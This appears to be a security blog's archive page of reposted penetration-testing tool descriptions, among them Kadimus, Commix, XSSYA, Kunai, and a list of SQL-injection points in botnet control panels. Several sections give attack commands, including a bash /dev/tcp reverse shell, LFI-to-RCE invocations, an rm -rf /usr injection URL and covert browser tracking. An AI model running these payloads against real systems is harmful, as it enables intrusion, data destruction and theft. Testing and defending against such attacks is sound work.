Never Ending Security

It starts all here

Category Archives: Penetration Testing

BlindElephant Web Application Fingerprinter



BlindElephant Web Application Fingerprinter


The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.

Sourceforge Project Page: https://sourceforge.net/projects/blindelephant/
Discussion and Forums: http://www.qualys.com/blindelephant
License: LGPL

Getting Started

BlindElephant can be used directly as a tool on the command line, or as a library to provide fingerprinting functionality to another program.

Pre-requisites:

  • Python 2.6.x (prefer 2.6.5); users of earlier versions may have difficulty installing or running BlindElephant.

Get the code:

Installation:

Installation is only required if you plan to use BlindElephant as a library. Make sure that your python installation has distutils, and then do:cd blindelephant/srcsudo python setup.py install(Windows users, omit sudo)

Example Usage (Command Line):

setup.py will have placed BlindElephant.py in your /usr/local/bin dir.

$ BlindElephant.py 
Usage: BlindElephant.py [options] url appName

Options:
  -h, --help            show this help message and exit
  -p PLUGINNAME, --pluginName=PLUGINNAME
                        Fingerprint version of plugin (should apply to web app
                        given in appname)
  -s, --skip            Skip fingerprinting webpp, just fingerprint plugin
  -n NUMPROBES, --numProbes=NUMPROBES
                        Number of files to fetch (more may increase accuracy).
                        Default: 15
  -w, --winnow          If more than one version are returned, use winnowing
                        to attempt to narrow it down (up to numProbes
                        additional requests).
  -l, --list            List supported webapps and plugins

Use "guess" as app or plugin name to attempt to attempt to
discover which supported apps/plugins are installed.

$ python BlindElephant.py http://laws.qualys.com movabletype
Loaded /usr/local/lib/python2.6/dist-packages/blindelephant/dbs/movabletype.pkl with 96 versions, 2229 differentiating paths, and 209 version groups.
Starting BlindElephant fingerprint for version of movabletype at http://laws.qualys.com 

Fingerprinting resulted in:
4.22-en
4.22-en-COM
4.23-en
4.23-en-COM

Best Guess: 4.23-en-COM

Example Usage (Library):

$python
>>> from blindelephant.Fingerprinters import WebAppFingerprinter
>>> 
>>> #Construct the fingerprinter
>>> #use default logger pointing to console; can pass "logger" arg to change output
>>> fp = WebAppFingerprinter("http://laws.qualys.com", "movabletype")
>>> #do the fingerprint; data becomes available as instance vars
>>> fp.fingerprint()
(same as above)
>>> print "Possible versions:", fp.ver_list
Possible versions: [LooseVersion ('4.22-en'), LooseVersion ('4.22-en-COM'), LooseVersion ('4.23-en'), LooseVersion ('4.23-en-COM')]
>>> print "Max possible version: ", fp.best_guess
Max possible version:  4.23-en-COM

The Static File Fingerprinting Approach in One Picture

Other Projects Like This


More information about BlindElephant can be found on: http://blindelephant.sourceforge.net



Advertisements

Exploit – Several Botnet(s) Vulnerabilities


Exploit – Several Botnet(s) Vulnerabilities!

BotNets are Mainly Created by Great Scripters, but some of them really LACK on Security!
A recent report made to siph0n.in by abdilo and asterea (@4sterea) identified How Un-Secure the Most Recent Botnets are!

Let’s give a look into it!

(1) BotNet is Vulnerable to Sh3ll Upload Vulnerability

iBanking

Type: Shell Upload

Sh3ll: *(2)

(18) BotNets are VULNERABLE to SQL Injection:

 Random panel

Type: SQLi
Vuln: http://site.com/g.php?id=1

 Athena

Type: SQLi
Vuln: http://localhost:8992/panel/gate.php?botid=1&newbot=1&country=AUD&country_code=AUD &ip=10.0.0.1&os=win&cpu=amd&type=mate&cores=1999&version=88.8&net=wlan&admin=narwals&busy=no&lastseen=now

Casinoloader

Type: SQLi
Vuln: http://localhost/gateway.php

POSTDATA page=1&val=1

 Citadel

Type: SQLi
Vuln: http://localhost/cp.php?bots=1

DLOADER

Type: SQLi
Vuln1: http://localhost/includes/get_kktocc.php?line=1
Vuln2: http://localhost/includes/update_url.php?fid=1

HERPES

SQL injection.

http://localhost/tasks.php POST: vote=1&submitted=1

JACKPOS

blindsqli after you login, pretty useless so i wont bother.

JHTTP

Some sqlinjection vulnerabilities past the assets folder.

SAKURA

Type: SQLi

http://localhost/func.php?showtopic=2 http://localhost/index.php?showtopic=322 http://localhost/sakuraadmin44.php?filename=1.png&cmd=rm%20-f%20-r%20%2Fusr%2F&edit=2312 http://localhost/sakuraadmin44.php?filename=1.png&cmd=apt-get%20install%20backdoor http://localhost/sakuraadmin44.php?link=http%3A%2F%2Fmetasploit.com%2F&threads=10 http://localhost/showthread.php?t=123 http://localhost/showthread.php?t=23&cmd=32

Type: SQLi – POST

http://localhost/sakuraadmin44.php?threads=222&link=21213.com POST: exploits=992.ds http://localhost/sakuraadmin44.php?threads=11 POST: snick=123&file=321&exploits=123 http://localhost/sakuraadmin44.php?threads=21 POST: snick=1

SILENCE WINLOCKER V5.0

SQL injection.

http://localhost/forma.php?pin=4322 http://localhost/index.php?x=1&act=delete&id=1 http://localhost/picture.php?pin=8787 http://localhost/tmp/get.php?pin=1334

SMOKE LOADER

Type: SQLi

http://localhost/control.php?id=1 http://localhost/guest.php?id=1

POST

SOLARBOT

SQL injection.

localhost/index.php POSTDATA i=1881&p=80&u=8302&h=282&s=AUD

SPY-EYE

Type: SQLi

http://localhost/frm_boa-grabber_sub.php?dt=11%2F11%2F1998

TINBA

Type: SQLi

\tinybanker panel\admin/control/logs.act.php http://localhost/logs.act.php Post Data: bot_uid=1&botcomment=mate

UMBRA

Type: SQLi

Vuln: http://localhost/delete_command.php?deleteID=1

VERTEXNET

There are sqlinjection vulnerabilities but the likely hood of you actually finding a way of exploiting them is low.

ZEUS AND ZEUS EVO

Type: SQLi

Vuln: http://localhost/gate.php?ip=8.8.8.8

ZSKIMMER

Type: SQLi

Vuln: http://localhost/process.php?xy=2

(3) BotNets are VULNERABLE to Cross-Site Scripting Vulnerability and Other Medium Issues:

CYTHOSIA BOTNET

Type: Stored XSS and iFrame redirect

Click add task Command: IFRAME SRC=”whateverekorlemonpartyorwhatnot.com” /IFRAME

Then Click Create Task Finally click Tasks. VOILA!

(Credits to asterea for finding this botnet panel)

CRIMEPACK 3.1.3

Secure shit, like no XSS’s or anything.

PLASMA

Some Cross site scripting vulns and nothing else so no use telling you about them.

Furthermore they have also identified (5) Secure Sh3lls :-)

Here you all can find the Secure Ones!

 Alin1

Nothing, unless logged in.

 Betabot

Nope.

 CRIMEPACK 3.1.3

Secure shit, like no XSS’s or anything.

SMSBOT

nothing interesting.

SPY POSCARDSTEALER

nope its secure.


If you all find any new Vulnerability, you can directly contact them below!

Contact: asterea@exploit.im

Twitter: 4sterea


(*)1 Source:

https://siph0n.in/exploits.php?id=3528

(*)2 iBanking Sh3ll:

http://pastebin.com/Dfczctfv

Nettool.sh – Automate frameworks For Nmap, Driftnet, Sslstrip, Metasploit And Ettercap MITM Attacks


Nettool.sh  – Automate frameworks For Nmap, Driftnet, Sslstrip, Metasploit And Ettercap MITM Attacks.

Netool.sh toolkit provides a fast and easy way For new arrivals to IT security pentesting and also to experience users to use allmost all features that the Man-In-The-Middle can provide under local lan, since scanning, sniffing and Social engineering attacks “[spear phishing attacks]”…

Netool its a toolkit written using ‘bash, python, ruby’ that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. This toolkit makes it easy tasks such as SNIFFING tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, DoS attacks in wan/lan networks, TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of target webbrowser surfing (driftnet), also uses macchanger to decoy scans changing the mac address.

Operative Systems Supported are:
Linux-ubuntu, kali-linux, backtack-linux (un-continued), freeBSD, Mac osx (un-continued)

Rootsector module allows you to automate some attacks over DNS_SPOOF + MitM (phishing – social engineering) using metasploit, apache2 and ettercap frameworks. Like the generation of payloads, shellcode, backdoors delivered using dns_spoof and MitM method to redirect a target to your phishing webpage. recent as introducted the scanner inurlbr (by cleiton). This tool brought to you by: peterubuntu10

Video:


More information can be found at: http://sourceforge.net/projects/netoolsh

BTS PenTesting Lab – Open Source vulnerable Web Application Platform


BTS PenTesting Lab – Open Source vulnerable Web Application Platform.

Are you a Penetration Tester, an Information Security Specialist and/or simply a Learner in Cyber Security?

This might be the right Pentesting Platform for perform your Penetratration Tests and Upgrade your Skillz! This is BTS Pentesting Lab an Open Source vulnerable Web Application Platform developed by Cyber Security & Privacy Foundation (www.cysecurity.org). It can be used to perform and learn all about many different types of web application vulnerabilities.

Currently, the App Contains the following Types of Vulnerabilities:

*SQL Injection

*XSS (includes Flash Based xss)

*CSRF

*Clickjacking

*SSRF

*File Inclusion

*Code Execution

*Insecure Direct Object Reference

*Unrestricted File Upload vulnerability

*Open URL Redirection

*Server Side Includes(SSI) Injection

and more…


More information can be found at: http://sourceforge.net/projects/btslab

XSSYA V-2.0 For Cross Site Scripting Vulnerability Confirmation Written In Python


XSSYA-V-2.0 (XSS Vulnerability Confirmation )

XSSYA is a Cross Site Scripting Scanner & Vulnerability Confirmation (Working in two Methods) • Method number 1 for Confirmation Request and Response • Method number 2 for Confirmation Execute encoded payload and search for the same payload in web HTML code but decoded • Support HTTPS • After Confirmation (execute payload to get cookies) • Identify 3 Types of WAF (Mod_Security – WebKnight – F5 BIG IP) • Can be run in (Windows – Linux) XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall) It Also Support Saving the Web Html Code Before Executing the Payload Viewing the Web HTML Code into the Screen or Terminal $ Python xssya.py Example $ Python xssya.py http://www.domain.com/ http://www.domain.com= http://www.domain.com?

• What have been changed? (XSSYA v 2.0 has more payloads; library contains 41 payloads to enhance detection level XSS scanner is now removed from XSSYA to reduce false positive URLs to be tested used to not allow any character at the end of the URL except (/ – = -?) but now this limitation has been removed

• What’s new in XSSYA V2.0 ? Custom Payload 1 – You have the ability to Choose your Custom Payload Ex: and you can encode your custom payload with different types of encodings like (B64 – HEX – URL_Encode –- HEX with Semi Columns)

(HTML Entities à Single & Double Quote only – brackets – And – or Encode all payload with HTML Entities) This feature will support also XSS vulnerability confirmation method which is you choose you custom payload and custom Encoding execute if response 200 check for same payload decoded in HTM code page.

• What’s new in XSSYA V2.0? HTML5 Payloads XSYSA V2.0 contains a library of 44 HTLM5 payloads

• What’s New in XSSYA V 2.0?

XSSYA have a Library for the most vulnerable application with XSS – Cross site scripting and this library counting (Apache – WordPress – PHPmy Admin) If you choose apache application it give the CVE Number version of Apache which is affected and the link for CVE for more details so it will be easy to search for certain version that is affected with XSS

• What’s New in XSSYA V 2.0? XSSYA has the feature to convert the IP address of the attacker to (Hex, Dword, Octal) to bypass any security mechanism or IPS that will be exist on the target Domain

• What’s New in XSSYA V 2.0?

XSSYA check is the target is Vulnerable to XST (Cross Site Trace) which it sends custom Trace Request and check if the target domain is Vulnerable the request will be like this:

TRACE / HTTP/1.0 Host: demo.testfire.net Header1: < script >alert(document.cookie);

The Module need to be downloaded is colorama-0.2.7 https://pypi.python.org/pypi/colorama gdshortener 0.0.2 https://pypi.python.org/pypi/gdshortener


More information can be found at: https://github.com/yehia-mamdouh/XSSYA-V-2.0

Kadimus For LFI / RFI Scan And Exploit Tool


Kadimus

LFI Scan & Exploit Tool

Kadimus is a tool to check sites to lfi vulnerability , and also exploit it

Features:

  • Check all url parameters
  • /var/log/auth.log RCE
  • /proc/self/environ RCE
  • php://input RCE
  • data://text RCE
  • Source code disclosure
  • Multi thread scanner
  • Command shell interface through HTTP Request
  • Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)
  • Proxy socks5 support for bind connections

Compile:

$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus

You can run the configure file:

./configure

Or follow this steps:

Installing libcurl:

  • CentOS/Fedora
# yum install libcurl-devel
  • Debian based
# apt-get install libcurl4-openssl-dev

Installing libpcre:

  • CentOS/Fedora
# yum install pcre-devel
  • Debian based
# apt-get install libpcre3-dev

Installing libssh:

  • CentOS/Fedora
# yum install libssh-devel
  • Debian based
# apt-get install libssh-dev

And finally:

$ make

Options:

  -h, --help                    Display this help menu

  Request:
    -B, --cookie STRING         Set custom HTTP Cookie header
    -A, --user-agent STRING     User-Agent to send to server
    --connect-timeout SECONDS   Maximum time allowed for connection
    --retry-times NUMBER        number of times to retry if connection fails
    --proxy STRING              Proxy to connect, syntax: protocol://hostname:port

  Scanner:
    -u, --url STRING            Single URI to scan
    -U, --url-list FILE         File contains URIs to scan
    -o, --output FILE           File to save output results
    --threads NUMBER            Number of threads (2..1000)

  Explotation:
    -t, --target STRING         Vulnerable Target to exploit
    --injec-at STRING           Parameter name to inject exploit
                                (only need with RCE data and source disclosure)

  RCE:
    -X, --rce-technique=TECH    LFI to RCE technique to use
    -C, --code STRING           Custom PHP code to execute, with php brackets
    -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                 Simple command shell interface through HTTP Request

    -r, --reverse-shell         Try spawn a reverse shell connection.
    -l, --listen NUMBER         port to listen

    -b, --bind-shell            Try connect to a bind-shell
    -i, --connect-to STRING     Ip/Hostname to connect
    -p, --port NUMBER           Port number to connect
    --b-proxy STRING            IP/Hostname of socks5 proxy
    --b-port NUMBER             Port number of socks5 proxy

    --ssh-port NUMBER           Set the SSH Port to try inject command (Default: 22)
    --ssh-target STRING         Set the SSH Host

    RCE Available techniques

      environ                   Try run PHP Code using /proc/self/environ
      input                     Try run PHP Code using php://input
      auth                      Try run PHP Code using /var/log/auth.log
      data                      Try run PHP Code using data://text

    Source Disclosure:
      -G, --get-source          Try get the source files using filter://
      -f, --filename STRING     Set filename to grab source [REQUIRED]
      -O FILE                   Set output file (Default: stdout)

Examples:

Scanning:

./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

Get source code of file:

./kadimus -t localhost/?pg=contact -G -f "index.php%00" -O local_output.php --inject-at pg

Execute php code:

./kadimus -t localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -X input

Execute command:

./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost

Checking for RFI:

You can also check for RFI errors, just put the remote url on resource/common_files.txt and the regex to identify this, example:

/* http://bad-url.com/shell.txt */
<?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>

in file:

http://bad-url.com/shell.txt?:scorpion say get over here

Reverse shell:

./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0

More information can be found at: https://github.com/P0cL4bs/Kadimus

Commix – An Command Injection Exploiter To Test And Find Web Application Bugs


   ___    ___     ___ ___     ___ ___ /\_\   __  _ 
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ { v0.1b }

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)
+--

General Information

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language.

Disclaimer

The tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes!!

Requirements

Python version 2.6.x or 2.7.x is required for running this program.

Installation

Commix comes pre-installed on the following Linux distributions:

Download commix by cloning the Git repository:

git clone https://github.com/stasinopoulos/commix.git commix

Usage

Usage: python commix.py [options]

Options

-h, --help            Show help and exit.
--verbose             Enable the verbose mode.
--install             Install 'commix' to your system.
--version             Show version number and exit.
--update              Check for updates (apply if any) and exit.

Target

This options has to be provided, to define the target URL.

--url=URL           Target URL
--url-reload        Reload target URL after command execution.

Request

These options can be used, to specify how to connect to the target
URL.

--host=HOST         HTTP Host header.
--referer=REFERER   HTTP Referer header.
--user-agent=AGENT  HTTP User-Agent header.
--cookie=COOKIE     HTTP Cookie header.
--random-agent      Use a randomly selected HTTP User-Agent header.
--headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
--proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').
--auth-url=AUTH_..  Login panel URL.
--auth-data=AUTH..  Login parameters and data.
--auth-cred=AUTH..  HTTP Basic Authentication credentials (e.g.
                    'admin:admin').

Enumeration

These options can be used, to enumerate the target host.

--current-user  Retrieve current user.
--hostname      Retrieve server hostname.
--is-root       Check if the current user have root privs.
--sys-info      Retrieve system information.

Injection

These options can be used, to specify which parameters to inject and
to provide custom injection payloads.

--data=DATA         POST data to inject (use 'INJECT_HERE' tag to specify
                    the testable parameter).
--suffix=SUFFIX     Injection payload suffix string.
--prefix=PREFIX     Injection payload prefix string.
--technique=TECH    Specify a certain injection technique : 'classic',
                    'eval-based', 'time-based' or 'file-based'.
--maxlen=MAXLEN     The length of the output on time-based technique
                    (Default: 10000 chars).
--delay=DELAY       Set Time-delay for time-based and file-based
                    techniques (Default: 1 sec).
--base64            Use Base64 (enc)/(de)code trick to prevent false-
                    positive results.
--tmp-path=TMP_P..  Set remote absolute path of temporary files directory.
--root-dir=SRV_R..  Set remote absolute path of web server's root
                    directory (Default: /var/www/).
--icmp-exfil=IP_..  Use the ICMP exfiltration technique (e.g.
                    'ip_src=192.168.178.1,ip_dst=192.168.178.3').
--alter-shell       Use an alternative os-shell (Python). Available only
                    for 'tempfile-based' injections.
--os-shell=OS_SH..  Execute a single operating system command.

Usage Examples

Exploiting Damn Vulnerable Web App:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

Exploiting php-Charts 1.0 using injection payload suffix & prefix string:

python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="'" --suffix="//"

Exploiting OWASP Mutillidae using extra headers and HTTP proxy:

python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

Exploiting Persistence using ICMP exfiltration technique :

su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8""

Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:

python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=INJECT_HERE&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="file-based" --root-dir="/"

Command injection testbeds

A collection of pwnable VMs, that includes web apps vulnerable to command injections.

Exploitation Demos


More information can be found at: https://github.com/stasinopoulos/commix

Kunai – A Tool For Pwning And Info Gathering via User Browser


Kunai 0.2

Sometimes there is a need to obtain ip address of specific person or perform client-side attacks via user browser. This is what you need in such situations.

Kunai is a simple script which collects many informations about a visitor and saves output to file; furthermore, you may try to perform attacks on user browser, using beef or metasploit.

In order to grab as many informations as possible, script detects whenever javascript is enabled to obtain more details about a visitor. For example, you can include this script in iframe, or perform redirects, to avoid detection of suspicious activities. Script can notify you via email about user that visit your script. Whenever someone will visit your hook (kunai), output fille will be updated.

Functions

  • Stores informations about users in elegant output
  • Website spoofing
  • Redirects
  • BeEF & Metasploit compatibility
  • Email notification
  • Diffrent reaction for javascript disabled browser
  • One file composition

Example configs

  • Website spoofing (more stable & better for autopwn & beef):
  • Redirect (better for quick ip catching):
goo.gl/urlink -> evilhost/x.php -> site.com/kitty.png
  • Cross Site Scripting (inclusion)

Screens


More information can be found on: https://github.com/Smaash/kunai

CipherScan – A very simple way to find out which SSL ciphersuites are supported by a target


CipherScan

$ ./cipherscan jve.linuxwall.info
........................
Target: jve.linuxwall.info:443

prio  ciphersuite                  protocols              pfs                 curves
1     ECDHE-RSA-AES128-GCM-SHA256  TLSv1.2                ECDH,P-384,384bits  secp384r1
2     ECDHE-RSA-AES256-GCM-SHA384  TLSv1.2                ECDH,P-384,384bits  secp384r1
3     DHE-RSA-AES128-GCM-SHA256    TLSv1.2                DH,2048bits         None
4     DHE-RSA-AES256-GCM-SHA384    TLSv1.2                DH,2048bits         None
5     ECDHE-RSA-AES128-SHA256      TLSv1.2                ECDH,P-384,384bits  secp384r1
6     ECDHE-RSA-AES128-SHA         TLSv1,TLSv1.1,TLSv1.2  ECDH,P-384,384bits  secp384r1
7     ECDHE-RSA-AES256-SHA384      TLSv1.2                ECDH,P-384,384bits  secp384r1
8     ECDHE-RSA-AES256-SHA         TLSv1,TLSv1.1,TLSv1.2  ECDH,P-384,384bits  secp384r1
9     DHE-RSA-AES128-SHA256        TLSv1.2                DH,2048bits         None
10    DHE-RSA-AES128-SHA           TLSv1,TLSv1.1,TLSv1.2  DH,2048bits         None
11    DHE-RSA-AES256-SHA256        TLSv1.2                DH,2048bits         None
12    DHE-RSA-AES256-SHA           TLSv1,TLSv1.1,TLSv1.2  DH,2048bits         None
13    AES128-GCM-SHA256            TLSv1.2                None                None
14    AES256-GCM-SHA384            TLSv1.2                None                None
15    AES128-SHA256                TLSv1.2                None                None
16    AES256-SHA256                TLSv1.2                None                None
17    AES128-SHA                   TLSv1,TLSv1.1,TLSv1.2  None                None
18    AES256-SHA                   TLSv1,TLSv1.1,TLSv1.2  None                None
19    DHE-RSA-CAMELLIA256-SHA      TLSv1,TLSv1.1,TLSv1.2  DH,2048bits         None
20    CAMELLIA256-SHA              TLSv1,TLSv1.1,TLSv1.2  None                None
21    DHE-RSA-CAMELLIA128-SHA      TLSv1,TLSv1.1,TLSv1.2  DH,2048bits         None
22    CAMELLIA128-SHA              TLSv1,TLSv1.1,TLSv1.2  None                None
23    DES-CBC3-SHA                 TLSv1,TLSv1.1,TLSv1.2  None                None

Certificate: trusted, 2048 bit, sha256WithRSAEncryption signature
TLS ticket lifetime hint: 300
OCSP stapling: supported
Cipher ordering: server

Cipherscan tests the ordering of the SSL/TLS ciphers on a given target, for all major versions of SSL and TLS. It also extracts some certificates informations, TLS options, OCSP stapling and more. Cipherscan is a wrapper above the openssl s_client command line.

Cipherscan is meant to run on all flavors of unix. It ships with its own built of OpenSSL for Linux/64 and Darwin/64. On other platform, it will use the openssl version provided by the operating system (which may have limited ciphers support), or your own version provided in the -o command line flag.

Examples

Basic test:

$ ./cipherscan google.com
...................
Target: google.com:443

prio  ciphersuite                  protocols                    pfs                 curves
1     ECDHE-RSA-CHACHA20-POLY1305  TLSv1.2                      ECDH,P-256,256bits  prime256v1
2     ECDHE-RSA-AES128-GCM-SHA256  TLSv1.2                      ECDH,P-256,256bits  prime256v1
3     ECDHE-RSA-AES128-SHA         TLSv1.1,TLSv1.2              ECDH,P-256,256bits  prime256v1
4     ECDHE-RSA-RC4-SHA            SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits  prime256v1
5     AES128-GCM-SHA256            TLSv1.2                      None                None
6     AES128-SHA256                TLSv1.2                      None                None
7     AES128-SHA                   TLSv1.1,TLSv1.2              None                None
8     RC4-SHA                      SSLv3,TLSv1,TLSv1.1,TLSv1.2  None                None
9     RC4-MD5                      SSLv3,TLSv1,TLSv1.1,TLSv1.2  None                None
10    ECDHE-RSA-AES256-GCM-SHA384  TLSv1.2                      ECDH,P-256,256bits  prime256v1
11    ECDHE-RSA-AES256-SHA384      TLSv1.2                      ECDH,P-256,256bits  prime256v1
12    ECDHE-RSA-AES256-SHA         SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits  prime256v1
13    AES256-GCM-SHA384            TLSv1.2                      None                None
14    AES256-SHA256                TLSv1.2                      None                None
15    AES256-SHA                   SSLv3,TLSv1,TLSv1.1,TLSv1.2  None                None
16    ECDHE-RSA-AES128-SHA256      TLSv1.2                      ECDH,P-256,256bits  prime256v1
17    ECDHE-RSA-DES-CBC3-SHA       SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits  prime256v1
18    DES-CBC3-SHA                 SSLv3,TLSv1,TLSv1.1,TLSv1.2  None                None

Certificate: trusted, 2048 bit, sha1WithRSAEncryption signature
TLS ticket lifetime hint: 100800
OCSP stapling: not supported
Cipher ordering: server

Testing STARTTLS:

darwin$ $ ./cipherscan --curves -starttls xmpp jabber.ccc.de:5222
................................
Target: jabber.ccc.de:5222

prio  ciphersuite                  protocols              pfs                 curves
1     ECDHE-RSA-AES256-GCM-SHA384  TLSv1.2                ECDH,P-256,256bits  prime256v1
2     ECDHE-RSA-AES256-SHA384      TLSv1.2                ECDH,P-256,256bits  prime256v1
3     ECDHE-RSA-AES256-SHA         TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits  prime256v1
4     DHE-RSA-AES256-GCM-SHA384    TLSv1.2                DH,1024bits         None
5     DHE-RSA-AES256-SHA256        TLSv1.2                DH,1024bits         None
6     DHE-RSA-AES256-SHA           TLSv1,TLSv1.1,TLSv1.2  DH,1024bits         None
7     DHE-RSA-CAMELLIA256-SHA      TLSv1,TLSv1.1,TLSv1.2  DH,1024bits         None
8     AES256-GCM-SHA384            TLSv1.2                None                None
9     AES256-SHA256                TLSv1.2                None                None
10    AES256-SHA                   TLSv1,TLSv1.1,TLSv1.2  None                None
11    CAMELLIA256-SHA              TLSv1,TLSv1.1,TLSv1.2  None                None
12    ECDHE-RSA-AES128-GCM-SHA256  TLSv1.2                ECDH,P-256,256bits  prime256v1
13    ECDHE-RSA-AES128-SHA256      TLSv1.2                ECDH,P-256,256bits  prime256v1
14    ECDHE-RSA-AES128-SHA         TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits  prime256v1
15    DHE-RSA-AES128-GCM-SHA256    TLSv1.2                DH,1024bits         None
16    DHE-RSA-AES128-SHA256        TLSv1.2                DH,1024bits         None
17    DHE-RSA-AES128-SHA           TLSv1,TLSv1.1,TLSv1.2  DH,1024bits         None
18    DHE-RSA-SEED-SHA             TLSv1,TLSv1.1,TLSv1.2  DH,1024bits         None
19    DHE-RSA-CAMELLIA128-SHA      TLSv1,TLSv1.1,TLSv1.2  DH,1024bits         None
20    AES128-GCM-SHA256            TLSv1.2                None                None
21    AES128-SHA256                TLSv1.2                None                None
22    AES128-SHA                   TLSv1,TLSv1.1,TLSv1.2  None                None
23    SEED-SHA                     TLSv1,TLSv1.1,TLSv1.2  None                None
24    CAMELLIA128-SHA              TLSv1,TLSv1.1,TLSv1.2  None                None

Certificate: UNTRUSTED, 2048 bit, sha1WithRSAEncryption signature
TLS ticket lifetime hint: None
OCSP stapling: not supported
Cipher ordering: client
Curves ordering: server
Curves fallback: False

Exporting to JSON with the -j command line option:

$ ./cipherscan --curves -j www.ebay.com | j
{
    "curves_fallback": "False",
    "serverside": "True",
    "target": "www.ebay.com:443",
    "utctimestamp": "2015-04-03T14:54:31.0Z",
    "ciphersuite": [
        {
            "cipher": "AES256-SHA",
            "ocsp_stapling": "False",
            "pfs": "None",
            "protocols": [
                "TLSv1",
                "TLSv1.1",
                "TLSv1.2"
            ],
            "pubkey": [
                "2048"
            ],
            "sigalg": [
                "sha1WithRSAEncryption"
            ],
            "ticket_hint": "None",
            "trusted": "True"
        },
        {
            "cipher": "ECDHE-RSA-DES-CBC3-SHA",
            "curves": [
                "prime256v1",
                "secp384r1",
                "secp224r1",
                "secp521r1"
            ],
            "curves_ordering": "server",
            "ocsp_stapling": "False",
            "pfs": "ECDH,P-256,256bits",
            "protocols": [
                "TLSv1",
                "TLSv1.1",
                "TLSv1.2"
            ],
            "pubkey": [
                "2048"
            ],
            "sigalg": [
                "sha1WithRSAEncryption"
            ],
            "ticket_hint": "None",
            "trusted": "True"
        }
    ]
}

Analyzing configurations

The motivation behind cipherscan is to help operators configure good TLS on their endpoints. To help this further, the script analyze.py compares the results of a cipherscan with the TLS guidelines from https://wiki.mozilla.org/Security/Server_Side_TLS and output a level and recommendations.

$ ./analyze.py -t jve.linuxwall.info
jve.linuxwall.info:443 has intermediate tls

Changes needed to match the old level:
* consider enabling SSLv3
* add cipher DES-CBC3-SHA
* use a certificate with sha1WithRSAEncryption signature
* consider enabling OCSP Stapling

Changes needed to match the intermediate level:
* consider enabling OCSP Stapling

Changes needed to match the modern level:
* remove cipher AES128-GCM-SHA256
* remove cipher AES256-GCM-SHA384
* remove cipher AES128-SHA256
* remove cipher AES128-SHA
* remove cipher AES256-SHA256
* remove cipher AES256-SHA
* disable TLSv1
* consider enabling OCSP Stapling

In the output above, analyze.py indicates that the target jve.linuxwall.info matches the intermediate configuration level. If the administrator of this site wants to reach the modern level, the items that failed under the modern tests should be corrected.

analyze.py does not make any assumption on what a good level should be. Sites operators should now what level they want to match against, based on the compatibility level they want to support. Again, refer to https://wiki.mozilla.org/Security/Server_Side_TLS for more information.

Note on Nagios mode: analyse.py can be ran as a nagios check with --nagios. The exit code will then represent the state of the configuration:

  • 2 (critical) for bad tls
  • 1 (warning) if it doesn’t match the desired level
  • 0 (ok) if it matches. cipherscan can take more than 10 seconds to complete. To alleviate any timeout issues, you may want to run it outside of nagios, passing data through some temporary file.

OpenSSL

Cipherscan uses a custom release of openssl for linux 64 bits and darwin 64 bits. OpenSSL is build from a custom branch maintained by Peter Mosmans that includes a number of patches not merged upstream. It can be found here: https://github.com/PeterMosmans/openssl

You can build it yourself using following commands:

git clone https://github.com/PeterMosmans/openssl.git --depth 1 -b 1.0.2-chacha
cd openssl
./Configure zlib no-shared experimental-jpake enable-md2 enable-rc5 \
enable-rfc3779 enable-gost enable-static-engine linux-x86_64
make depend
make
make report

The statically linked binary will be apps/openssl.

More information can be found on: https://github.com/jvehent/cipherscan

WATOBO – the unofficial manual


